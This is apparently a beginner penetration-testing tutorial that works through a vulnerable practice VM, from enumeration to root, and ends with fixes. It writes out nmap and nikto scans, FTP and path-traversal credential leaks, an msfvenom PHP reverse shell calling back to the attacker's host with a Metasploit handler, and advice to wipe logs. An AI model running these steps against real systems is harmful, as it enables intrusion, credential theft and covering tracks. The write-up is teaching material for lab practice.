Introduction to Penetration Testing
Introduction
An internal pentest is a dedicated attack, similar to that of a hacker, for the purpose of evaluating a network and its machines. These findings are then reported back to improve the protection of a network in case of any future attacks.
In this test, only a single machine was tested. This machine was compromised due to misconfigurations in the software and also through the leakage of sensitive information, such as administrative passwords. The end result was that the machine attacked during the penetration test was fully compromised with administrative privileges.
Disclaimer
I have provided a virtual machine that anyone can follow along with while reading this writeup.
Do note that what you see here does not reflect a real life penetration test. Though some things may be similar, this virtual machine was created with the idea of teaching methods and a way of thinking instead of being truely realistic. Even though it's not realistic it's possible to gain a lot of knowledge from following this tutorial.
One other thing to mention is that I used Kali Linux for this writeup. For best results it's best to use Kali Linux if you plan on following along. Kali Linux isn't specificly needed for penetration testing, but it comes ready out of the box.
Warning
It goes without saying but never attack a machine that you don't have permssion to work on. It can cause some trouble or other people. If you need to practice there are places to get vulnerable virtual machines like vulnhub.com
and pentesterlab.com
.
Downloading
The VM can be downloaded from the following location.
https://mega.nz/#!c7p1wC7a!d6ibjo3QHxtUj1OmF33MTeR5Hxsq9Lp9lAaN8swmx4M
It's in OVA format so it should be able to be imported into VirtualBox with no issues.
Troubleshooting VM Configuration
When using the VM sometimes a DHCP issue may occur and it may prevent the VM from acquiring a new IP address when it boots up. In order to remedy this I created a special user with the credentials xvmadmin/xvmadmin
that can be used to fix the DHCP settings.
For fixing DHCP issues, you can edit the /etc/network/interfaces
file. You can add something similar to this in order to assign a static IP address.
auto eth0
iface eth0 inet static
address 192.168.1.55
netmask 255.255.255.0
network 192.0.0.0
broadcast 192.0.0.255
gateway 192.168.1.1
dns-nameservers 8.8.8.8 8.8.4.4
Methodology
Finding the VM
There are two ways to find the IP address for the VM. You can login using the credentials provided in the troubleshooting section and then use the command ifconfig
to view all the attached interfaces. The other method you can try is using a tool like netdiscover
or arp-scan
. Below is an example of running netdiscover
. One thing to note is that when using VirtualBox to host VMs they come up with the vendor name of Cadmus Computer Systems.
Currently scanning: 192.168.91.0/16 | Screen View: Unique Hosts
36 Captured ARP Req/Rep packets, from 9 hosts. Total size: 2160
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.227 10:0d:7f:4d:b7:ec 5 300 Unknown vendor
192.168.1.1 20:e5:2a:08:fa:0e 6 360 Unknown vendor
192.168.1.11 b8:27:eb:9a:ae:22 2 120 Unknown vendor
192.168.1.142 02:0f:b5:e8:58:0c 2 120 Unknown vendor
192.168.1.169 00:6b:9e:37:31:b5 1 60 Unknown vendor
192.168.1.189 08:00:27:7f:c6:40 1 60 Cadmus Computer Systems
192.168.1.236 70:77:81:29:14:35 1 60 Unknown vendor
192.168.1.226 02:0f:b5:40:c4:d2 1 60 Unknown vendor
172.20.100.245 02:0f:b5:01:a4:7f 13 780 Unknown vendor
Initial Enumeration
In my case the target IP is 192.168.1.189
. If you're following along without the VM you will mostly have a different target IP address so do take note of that.
After finding the target IP we can then start the inital enumeration process. Enumeration is the main component of penetration testing, it all works by checking every detail you possibly can and then seeing what you can learn from it. The best way to start this off in a network is by using nmap
.
Nmap is a port scanner, it can either be light or noisey depending on the flags/options uses. Doing a full agressive scan on every port is the most ideal way of gathering accurate information, but it is not always possible. The noiser a scan, the more traffic it creates. Creating more traffic means that you'll be easier to detect and in some cases it can crash a weaker machine if the scan is too strong. However, in our case since we're targeting our own virtual machine we can be as noisey as we want. Below is an example of an nmap
line and it's related options.
nmap -v -Pn -A -sC -sS <IP ADDRESS> -p-
Parameter/Flag Meanings
-v
: Increased verbosity level-
Nmap commands output to terminal in real time
- Allows for faster enumeration
-
-Pn
: Treat host as online -
This merely just speeds up the scan
-
-A
: Aggressive scan -
This option enables:
- OS Detection
- Version Detection
- Script Scanning
- Traceroute
-
-sC
: Default script scan -
Loads default NSE scripts
- Nmap NSE scripts can be used for additional scanning of a particular port or service
- On Kali Linux distributions, they are located at:
/usr/share/nmap/scripts
-
-sS
: Stealth/SYN scan - TCP port scanning method
- It involves sending SYN packets to various ports without completing a TCP handshake
- In return, the target machine send a SYN-ACK response when a port is open
- No ACK is needed to be sent as a response
- Contrary to it's name, a SYN scan is not stealthy at all
- In the past this method would bypass firewall logging
- This is not true anymore
-
Scanning is performed faster due to not completing the three-way handshake
-
-p-
: Scan all 65535 ports - Nmap by default only scans the top 100 most popular ports
- Scanning every port takes a long time and generates visible traffic
Using these nmap
options we run a scan on the target machine.
root@kali:~# nmap -v -Pn -A -sC -sS 192.168.1.189 -p-
...snip...
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 65 Feb 27 19:05 account-details.txt
|_drwxr-xr-x 2 ftp ftp 4096 Feb 27 20:34 pub
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 17:f9:81:b4:24:55:57:ae:f0:46:d1:3d:fd:ef:ef:6e (DSA)
| 2048 50:6a:91:12:2d:39:24:fa:be:1c:c6:97:90:63:bf:7a (RSA)
|_ 256 79:16:05:d9:ac:6c:75:51:51:84:a1:86:4f:dc:03:71 (ECDSA)
80/tcp open http nginx
|_http-generator: GravCMS
| http-robots.txt: 9 disallowed entries
| /backup/ /bin/ /cache/ /grav/ /logs/ /system/ /vendor/
|_/user/ /admin/
|_http-server-header: nginx
|_http-title: Blog | Saturn
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 48665/udp status
|_ 100024 1 56403/tcp status
8000/tcp open http nginx
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx
|_http-title: Welcome to nginx on Debian!
8080/tcp open http nginx
|_http-server-header: nginx
|_http-title: 403 Forbidden
56403/tcp open status 1 (RPC #100024)
...snip...
It's generally a good idea to parse through the information and organize it. One key thing that strikes out from the scan is that this is a linux machine. We can sum up our initial findings in a table.
Port | Service | Version | Misc. Details |
---|---|---|---|
21 | ftp | vsftpd 3.0.2 | Anonymous login allowed |
22 | ssh | OpenSSH 6.7p1 | n/a |
80 | http | nginx | Running GravCMS, has a robots.txt |
111 | rpcbind | n/a | n/a |
8000 | http | nginx | n/a |
8080 | http | nginx | n/a |
56403 | status | n/a | n/a |
Before moving on to enumerating each service individually we can search exploit-db
for exploits on any software we found. Searching can be done on Kali Linux with the searchsploit
command.
root@kali:~# searchsploit vsftpd
--------------------------------------------------------------- -----------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------------------------- -----------------------------
vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption E | ./linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service | ./linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | ./unix/remote/17491.rb
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of | ./windows/dos/31818.sh
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of | ./windows/dos/31819.pl
--------------------------------------------------------------- -----------------------------
FTP
According to our nmap scan, FTP is configured to have anonymous login.
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 65 Feb 27 18:05 account-details.txt
|_drwxr-xr-x 2 ftp ftp 4096 Feb 27 14:29 pub
Anonymous login by itself is not a bad thing. However, if it is misconfigured it may provide access to sensitive files.
In order to log in to FTP, we provide the name anonymous at log in. This allows us to enter as an anonymous user.
root@kali:~# ftp 192.168.1.189
Connected to 192.168.1.189.
220 (vsFTPd 3.0.2)
Name (192.168.1.189:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
A directory listing reveals a file named account-details.txt
. Using the GET
command retrieves the file and places it into the current directory of your terminal.
Note: For a list of available FTP commands you can simply type help
. Additionally if you would like to know more about a command you can use the help <COMMAND>
.
ftp> help get
get receive file
As you can see, we were able to use this command to retrieve the file.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 65 Feb 27 18:05 account-details.txt
drwxr-xr-x 2 ftp ftp 4096 Feb 27 14:29 pub
226 Directory send OK.
ftp> get account-details.txt
local: account-details.txt remote: account-details.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for account-details.txt (65 bytes).
226 Transfer complete.
65 bytes received in 0.00 secs (463.3326 kB/s)
ftp> exit
221 Goodbye.
The file reveals info about an admin account. It provides Password1234
as a credential. These set of credentials may later turn out to be useful.
root@kali:~# cat account-details.txt
-Account Setup-
I set up your admin account.
Pass: Password1234
SSH
SSH is usually hard to break through, unless there is some sort of exploit lying around. The leaves another method which is conducting password attacks and it is not very advisable in a real test due to the amount of noise it makes and there's also the possiblity of getting locked out
Seeing as we acquired some credentials earlier we can try to log in. We don't know any users however we do know that is a linux machine and that root is always a default user.
root@kali:~# ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
However, it seems that the credential Password1234
wouldn't work. We recall that the message that we acquired earlier through ftp mentioned an admin account, so perhaps there is an admin user.
root@kali:~# ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
But once again it is of no use. As we can see, SSH doesn't specify if a user exists or not which makes it harder for an attacker to break through SSH.
HTTP Enumeration
For HTTP enumeration we can use tools like nikto
. Nikto is an open source web scanner. This is the tool to use when finding a vulnerability on the server. However, this tool is extremely noisy and can potentially bring down a weaker server.
Nikto tends to give out a lot of information and sometimes this can lead to a lot of false positives. This is especially true when a webserver spits out 2xx success status codes in response to any directory that nikto tries to check. Below is an example of a nikto
command.
nikto -h <IP ADDRESS>:<PORT>
-h
: Target address- This flag is needed in order to specify a target
- Example:
nikto -h google.com
ornikto -h 74.125.224.72
Port 80
According to nmap this page should be some sort of CMS. A CMS, (Content Management System) is a content managing application, a lot of websites use CMS for diplaying or managing their content. One thing about CMS is that they tend to be vulnerable if not patched and they're also a good means for acquiring a shell into the target machine. This particular machine is running Grav CMS webserver
root@kali:~# nikto -h 192.168.1.189:80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.189
+ Target Hostname: 192.168.1.189
+ Target Port: 80
+ Start Time: 2017-04-10 14:05:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie grav-site-b3974d7 created without the httponly flag
+ All CGI directories 'found', use '-C none' to test none
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x58b4b5f4 0xd7
+ Cookie grav-site-b3974d7-admin created without the httponly flag
+ "robots.txt" contains 11 entries which should be manually viewed.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ OSVDB-637: /~ftp/: Allowed to browse ftp user's home directory.
+ 26199 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2017-04-10 14:15:58 (GMT-4) (638 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
One common thing in websutes is the robots.txt
file. It is used to tell bots which locations to not scan. These locations are usually directories or administrative pages. In this case it shows the page /admin/
.
root@kali:~# curl 192.168.1.38:189/robots.txt
User-agent: *
Disallow: /backup/
Disallow: /bin/
Disallow: /cache/
Disallow: /grav/
Disallow: /logs/
Disallow: /system/
Disallow: /vendor/
Disallow: /user/
Disallow: /admin/
Allow: /user/pages/
Allow: /user/themes/
Navigating to this location http://192.168.1.189/admin
reveals an admin page.
The credentials we gained from the FTP server seem like they would work here admin/Password1234
.
This allows to gain access into the Grav CMS admin console. However, there doesn't seem to be anything we can use to gain a shell on the machine. This particular CMS uses flatfiles and it doesn't seem to havy any of the vulnerabilities that other CMS have. One piece of information that we can take from this admin console is that the admin's name is Justin
.
Port 8000
This page appeared to be just a standard static nginx page.
root@kali:~# nikto -h 192.168.1.189:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.189
+ Target Hostname: 192.168.1.189
+ Target Port: 8000
+ Start Time: 2017-04-10 14:06:12 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ Server leaks inodes via ETags, header found with file /, fields: 0x58b3242d 0x363
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7537 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2017-04-10 14:06:31 (GMT-4) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Port 8080
This port is interesting. Nikto has revealed that the files inside the operating system's may be accessed and retrieved through the web server.
root@kali:~# nikto -h 192.168.1.189:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.189
+ Target Hostname: 192.168.1.189
+ Target Port: 8080
+ Start Time: 2017-04-10 14:06:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server leaks inodes via ETags, header found with file /bin/ss, fields: 0x5409cf66 0x130a0
+ /bin/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /bin/date: Gateway to the unix command, may be able to submit extra commands
+ ///etc/passwd: The server install allows reading of any system file by adding an extra '/' to the URL.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-3092: /etc/passwd: An '/etc/passwd' file is available via the web site.
+ 8348 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2017-04-10 14:06:47 (GMT-4) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We can use curl
to try retrieving the /etc/passwd
file in order to prove this. Curl is a tool that can retrieve banner or protocol info and if used on a webpage file it can display the contents out on the terminal.
root@kali:~# curl 192.168.1.189:8080/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
grav:x:1000:1000:,,,:/home/grav:/bin/bash
ftp:x:108:114:ftp daemon,,,:/srv/ftp:/bin/false
justin:x:1001:1001::/home/justin:/bin/rbash
xvmadmin:x:1002:1002::/home/xvmadmin:/bin/sh
We can also try to curl other files like /etc/shadow
which contains all the user account hashes. However, it is unsuccessful. This is due to permissions. The shadow file is only viewable through root level accounts. If this webpage was run under the root user then it would be possible to view the contents. However, on linux the default user that handles hosting websites is usually the www-data
user.
root@kali:~# curl 192.168.1.189:8080/etc/shadow
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
Looking back at our findings there is something that catches our attention. The name of the admin that we found in the Grav admin console matches one of the existing users.
justin:x:1001:1001::/home/justin:/bin/rbash
.
With this in mind we can try using SSH to log in as that user using the same credentials that we used to gain access to the website.
Gaining Access
root@kali:~# ssh [email protected]
The authenticity of host '192.168.1.189 (192.168.1.189)' can't be established.
ECDSA key fingerprint is SHA256:aDJ2HNZTZlKZImDW3reaQA2zzrjZTh+LIOfxFlNKujQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.189' (ECDSA) to the list of known hosts.
[email protected]'s password:
____ ___ ____ ___ ___ ___ ____ ____ ____
`MM( )M' `Mb( )d' `MMb dMM' 6MMMMb 6MMMMb 6MMMMb
`MM. d' YM. ,P MMM. ,PMM 8P Y8 8P Y8 8P Y8
`MM. d' `Mb d' M`Mb d'MM 6M Mb 6M Mb 6M Mb
`MM. d' YM. ,P M YM. ,P MM MM MM MM MM MM MM
`MMd `Mb d' M `Mb d' MM MM MM MM MM MM MM
dMM. YM. ,P M YM.P MM MM MM MM MM MM MM
d'`MM. `Mb d' M `Mb' MM MMMMMMM MM MM MM MM MM MM
d' `MM. YM,P M YP MM YM M9 YM M9 YM M9
d' `MM. `MM' M `' MM 8b d8 8b d8 8b d8
_M(_ _)MM_ YP _M_ _MM_ YMMMM9 YMMMM9 YMMMM9
Welcome to XVM-000!
Last login: Tue Mar 28 02:09:28 2017
justin@XVM-000:~$ id
uid=1001(justin) gid=1001(justin) groups=1001(justin)
We quickly find out that we have are stuck inside of an instance of rbash. This is a restricted shell and certain commands are not available. Additionally, we are unable to leave the home directory.
justin@XVM-000:~$ cd /
-rbash: cd: restricted
One way to get out of this situation is by exploiting the misconfiguration that allows us to see the /etc/passwd/
file. If the nginx server allows PHP execution, we can use that to execute a payload that sends a reverse shell to the Kali Linux machine.
One problem though is that we are unable to write to file.
justin@XVM-000:~$ echo "test" > test.txt
-rbash: test.txt: restricted: cannot redirect output
Some of these restricted shells have a list of commands that are not allowed. These lists may not always be perfect so we can try seeing if there is anything that can allows to write to a file. In thise case it seems that using nano
to write a file is completely okay to do.
On the Kali Linux machine we can use msfvenom to generate a PHP payload. Msfvenom can generate may types of payloads depending on the file type or format needed. A payload is just a file that executes on the server, in this case it executes a reverse shell on the target machine and sends it to our attacking machine.
The dfollowing command can generate a payload for us. Note that the IP address used is our attacking machine's and not the target machine.
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.158 LPORT=443 -f raw
This payload requires the removal of the double slash in the front of the file in order to work. Afterwards we can paste it into nano
through the SSH shell that we have open. Now we simply need to visit the file using HTTP. Using the realpath
on the target machine's shell we see the exact location that we need to visit.
justin@XVM-000:~$ realpath shell.php
/home/justin/shell.php
Before we can visit it we must first setup a handler. A handler is basicially something that can catch the shell. In this case we are using a reverse shell and that works by having the victim machine send a shell to the IP address and port that the attacking machine has set up to listen.
Two common handlers are nc
and meterpreter
which is also part of the metasploit framwork. However, in our case, we are using the payload php/meterpreter_reverse_tcp
which is a staged payload that can only be caught by meterpreter
. A staged payload works by sending the rest of the payload over to the machine when a connection is made. This is something that nc
cannot do.
We can setup the meterpreter
handler by doing the following. First we start up metasploit by using the msfconsole
command. Then we set the handler.
root@kali:~# msfconsole
…snip…
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.20
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
We use curl
again to visit the page, however this time it will execute our reverse shell.
curl http://192.168.1.189:8080/home/justin/shell.php
At the same exact time we execute the reverse shell, we get a meterpreter session.
[*] Started reverse TCP handler on 192.168.1.158:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.158:443 -> 192.168.1.189:39288) at 2017-04-10 14:22:05 -0400
sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : XVM-000
OS : Linux XVM-000 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64
Meterpreter : php/linux
We are now in the meterpreter shell, meterpreter has it's own commands that are usable. However, if you want to use linux commands we can create another shell into the system.
meterpreter > shell
Process 773 created.
Channel 0 created.
The linux shell we have now is slightly troublesome and may cause issues when doing certain commands. It is not an interactive shell like SSH is so it might be a little funky to you. It is usually a good practice to spawn a shell again whenever you connect to a machine through a reverse shell. Since we know this is a linux machine then python will most likely be installed by default. We can do the following to spawn a new shell.
python -c 'import pty; pty.spawn("/bin/sh")';
There are many ways to enumerate a Linux system for information. A good resource that details this is g0tmi1k's Basic Linux Privilge Escalation Guide. Following this guide we can eventually find our way into acquiring root privileges.
Eventually we should come to realize that the root user's files are readable. This can be seen be done using ls -al
to list all files and their permissions and inspecting each directory.
drwxrwxrwx 2 root root 4096 Mar 28 02:12 .
drwxr-xr-x 22 root root 4096 Feb 26 13:26 ..
-rwxrwxrwx 1 root root 101 Mar 28 02:26 .bash_history
-rwxrwxrwx 1 root root 570 Jan 31 2010 .bashrc
-rwxrwxrwx 1 root root 140 Nov 19 2007 .profile
-rwx------ 1 root root 33 Mar 28 01:55 proof.txt
While this does not seem like a huge deal, it can very well be if there is sensitive info lying around. Inside the root directory we can also read the bash history filecat /root/.bash_history
. This file is a list of commands used by the specific user while working on their terminal. Upon closer inspection we see that the user changed their password with a method that blatantly displays the password over clear text.
echo "root:azfruby1337" | chpasswd
Now we need to find a way to use these credentials. One way that sticks out is to use SSH like we did earlier, usually it is best practice to disable root password login on SSH. This is because it is a default user that is present and it is easy to attempt to bruteforce it. This is especially true for servers that are facing the internet, bots roam the internet looking for Port 22 and attempt to break in. In fact a friend of mine was managing a cloud server that had root login enabled, after a while he noticed that there were weird files on his server. The logs showed that someone managed to break through and took over the system using SSH by bruteforcing the root user's password.
With this in mind we can SSH as the root user and get the proof.
root@kali:~# ssh [email protected]
[email protected]'s password:
____ ___ ____ ___ ___ ___ ____ ____ ____
`MM( )M' `Mb( )d' `MMb dMM' 6MMMMb 6MMMMb 6MMMMb
`MM. d' YM. ,P MMM. ,PMM 8P Y8 8P Y8 8P Y8
`MM. d' `Mb d' M`Mb d'MM 6M Mb 6M Mb 6M Mb
`MM. d' YM. ,P M YM. ,P MM MM MM MM MM MM MM
`MMd `Mb d' M `Mb d' MM MM MM MM MM MM MM
dMM. YM. ,P M YM.P MM MM MM MM MM MM MM
d'`MM. `Mb d' M `Mb' MM MMMMMMM MM MM MM MM MM MM
d' `MM. YM,P M YP MM YM M9 YM M9 YM M9
d' `MM. `MM' M `' MM 8b d8 8b d8 8b d8
_M(_ _)MM_ YP _M_ _MM_ YMMMM9 YMMMM9 YMMMM9
Welcome to XVM-000!
Last login: Mon Apr 10 13:19:56 2017
root@XVM-000:~# cat /root/proof.txt
WW91IGhhdmUgcHduZWQgWFZNLTAwMCEK
House Cleaning/Anti-Forensics
It is important for penetration testers to not leave a trace or exploits lying around on their target machines. This doesn't matter too much in our case since we used a vulnerable virtual machine as our target, but it is still a good habit to do. Anything that was transferred into the server should be removed. Also it is a good idea to do your things in the /tmp
directory for easy removal. There are also log files may show hints that a penetration testing took place, for example the bash history file or the Nginx log file that is probably filled with random requests from Nikto. It might me a good idea to wipe these clean.
Recommendations
There were quite a few things wrong with this server. Below is a table highlighting these issues and their fixes.
Service | Issue | Fix |
---|---|---|
FTP | Anonymous login displayed sensitive info | Move sensitive files or disable anonymous log in |
SSH | Root login enabled | Disable root login |
HTTP Port 80 - GravCMS | Weak credentials | Use stronger credentials |
HTTP Port 8080 | Displays file system | Change nginx configuration |
Conclusion
This writup should hopefully give some insight into penetration testing for people who are new. Just remember that this isn't an example of a real production environment. A real environment will be vastly different.